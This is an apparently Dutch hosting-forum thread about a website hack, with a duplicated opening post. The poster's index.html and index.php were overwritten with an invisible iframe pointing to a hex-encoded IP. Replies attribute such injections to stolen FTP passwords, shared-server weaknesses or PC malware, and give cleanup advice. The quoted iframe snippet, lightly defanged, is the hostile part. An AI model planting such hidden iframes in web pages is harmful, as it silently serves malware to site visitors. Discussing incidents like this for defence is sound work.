Dames en heren,

Ik sta voor een raadsel. Onlangs is een door ons ontwikkelde website gehackt. De bestanden index.html en index.php werden overschreven met de volgende code:


<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src= h t t p : / / 0xcb puntje 0xdf.0x9e.0x0c/t' width='6' height='6'
style='visibility: hidden;'></iframe>

Ik heb al flink gezocht, maar kom nog niet tot een oorzaak. Maar ik denk wel dat het gaat om het gebruik van een specifiek FTP-programma. Nu is mijn vraag: Wie herkent dit probleem? En als het jou is overkomen, welk FTP-programma gebruikte je toen?

Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...

Ik hoor graag jullie feedback.

Groeten,


Lenny

Dames en heren,

Ik sta voor een raadsel. Onlangs is een door ons ontwikkelde website gehackt. De bestanden index.html en index.php werden overschreven met de volgende code:


<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src= h t t p : / / 0xcb puntje 0xdf.0x9e.0x0c/t' width='6' height='6'
style='visibility: hidden;'></iframe>

Ik heb al flink gezocht, maar kom nog niet tot een oorzaak. Maar ik denk wel dat het gaat om het gebruik van een specifiek FTP-programma. Nu is mijn vraag: Wie herkent dit probleem? En als het jou is overkomen, welk FTP-programma gebruikte je toen?

Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...

Ik hoor graag jullie feedback.

Groeten,


Lenny

Dit komt niet door een FTP programma, maar vaak door lekke code ergens op de server van een website. Dit zijn defaces je dient dan ook bij je hostingprovider aan te kloppen voor een mogelijke beveiliging.

Misschien ben niet jij, maar je provider de schuldige...

http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=h+t+t+p+%3A+%2F+%2F+0xcb.0xdf.0x9e.0x0c%2Ft

DreamHost?

Heren,

Dank voor de snelle reacties.

We hebben voor het weekend inderdaad een e-mailformulier naar de markt gecommuniceerd. Het betreft Phil-a-Form. Hier hebben we echter geen lek in kunnen vinden. Het leek de meest aannemelijke oorzaak.

Technotop: Ik zal dit ook zeker even met mijn hoster bespreken. En geef hier hun commentaar terug. Ik wil nog niet direct de naam van de hoster noemen aangezien ik geen onnodige negatieve publiciteit voor ze wil. Tot nu toe ben ik namelijk erg tevreden over hun dienstverlening. De website wordt overigens niet gehost door Dreamhost, maar door een gerenommeerde Nederlandse provider.

Lenny

Kan het probleem niet komen door slecht beveiligde andere sites op de server ? (die vervolgens andere sites op dezelfde server konden infecteren).

Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...


Even voor de duidelijkheid : Dat zijn we dus niet, maar waarschijnlijk onze .com concullegae...
Dit soort problemen - zoals omschreven door TS - komen helaas wel vaker voor indien één installatie wordt gebruikt voor al haar cliënten.

Bij dreamhost waren laatst 2500 FTP passwords gestolen, ze hebben dit direct bekend gemaakt en alle klanten verzocht hun passwords aan te passen :)

wellicht een goed idee om alle FTP passwords / users te veranderen just in case?

En inderdaad dat mailform eens goed na te lopen & eventuele upload scripts + directories met volledige schrijfrechten te bekijken ..

Er stond ook niets vreemds in de access logs?

> Ramon. We hebben inderdaad de passwords gewijzigd. Nu is er geen probleem meer. Alleen wel jammer dat ik niet kan achterhalen waar het door kwam.

> dreamhost_nl: Het was niet mijn bedoeling jullie in een kwaad daglicht te stellen. Ik bedoelde hier inderdaad jullie internationale naamgenoten!

> Ramon. We hebben inderdaad de passwords gewijzigd. Nu is er geen probleem meer. Alleen wel jammer dat ik niet kan achterhalen waar het door kwam.

> dreamhost_nl: Het was niet mijn bedoeling jullie in een kwaad daglicht te stellen. Ik bedoelde hier inderdaad jullie internationale naamgenoten!

Wij hebben dit ook ondervonden. Onze provider geeft aan dat hij dit al eens eerder heeft gezien. Destijds was een virus die het wachtwoord en gebruikernaam onderschepte de oorzaak. Het enige dat tot nu toe bij ons heeft geholpen is je pc op virussen en spyware te checken en geen wachtwoorden in je ftp programma te saven en inderdaad direct de wachtwoorden van ftp en overige zaken aan te passen.
Let ook op het uiterlijk van je site. Deze wijzigt veelal door de toevoeging van de iframes. Vertrouw je het niet, vraag dan eerst een bronbestand van je website op en check deze op iframes en de proxycode 8080:

Knap staaltje reanimatie..

Door die reanimatie sloeg mijn virusscanner op hol. Die link staat ondanks de spaties op een blacklist. Nu zonder virusscanner kan ik WHT tenminste weer bezoeken...

Ondanks het feit dat het een topic uit de oudheid is, toch nog even dit: recent hebben wij ook bij een klant gezien dat een virus/spyware op een windows-pc blijkbaar usernames/paswoorden ging verzamelen, en toen opeens overal iframes ging inzetten. Het blijft dus spelen, en is de wereld nog niet uit...

Het is de wereld nog lang niet uit, helaas. Zolang virussen en andere malware in staat blijven om FTP-wachtwoorden uit cache, bestanden, e.d. te vissen én het voor skriptkiddo's en spammers lucratief blijft, zal dit nog wel even aanhouden.

Deze week nog maar 3 websites ontoegankelijk gemaakt ("rustig weekje") (*). Wij adviseren klanten dan om:
1) de website te verwijderen
2) de PC te scannen op malware, met een nieuw geinstalleerde virusscanner (AVG, ClamAV, MRT of whatever)
3) na opschoning van de PC, de FTP wachtwoorden te veranderen naar een wachtwoord van het liefst 12-14 karakters, maar minimaal 8.

Is hieraan voldaan wordt een website weer toegankelijk gemaakt.

(*) de trend sinds deze week is om weer mass mailing scripts te uploaden. Een paar maanden lang is dit "uit de mode" geweest en werden er enkel iframes en payloads aan index bestanden toegevoegd. Maar nu staan de verschillende PHP scripts er weer. Vaak al dagen voor het spammen geupload.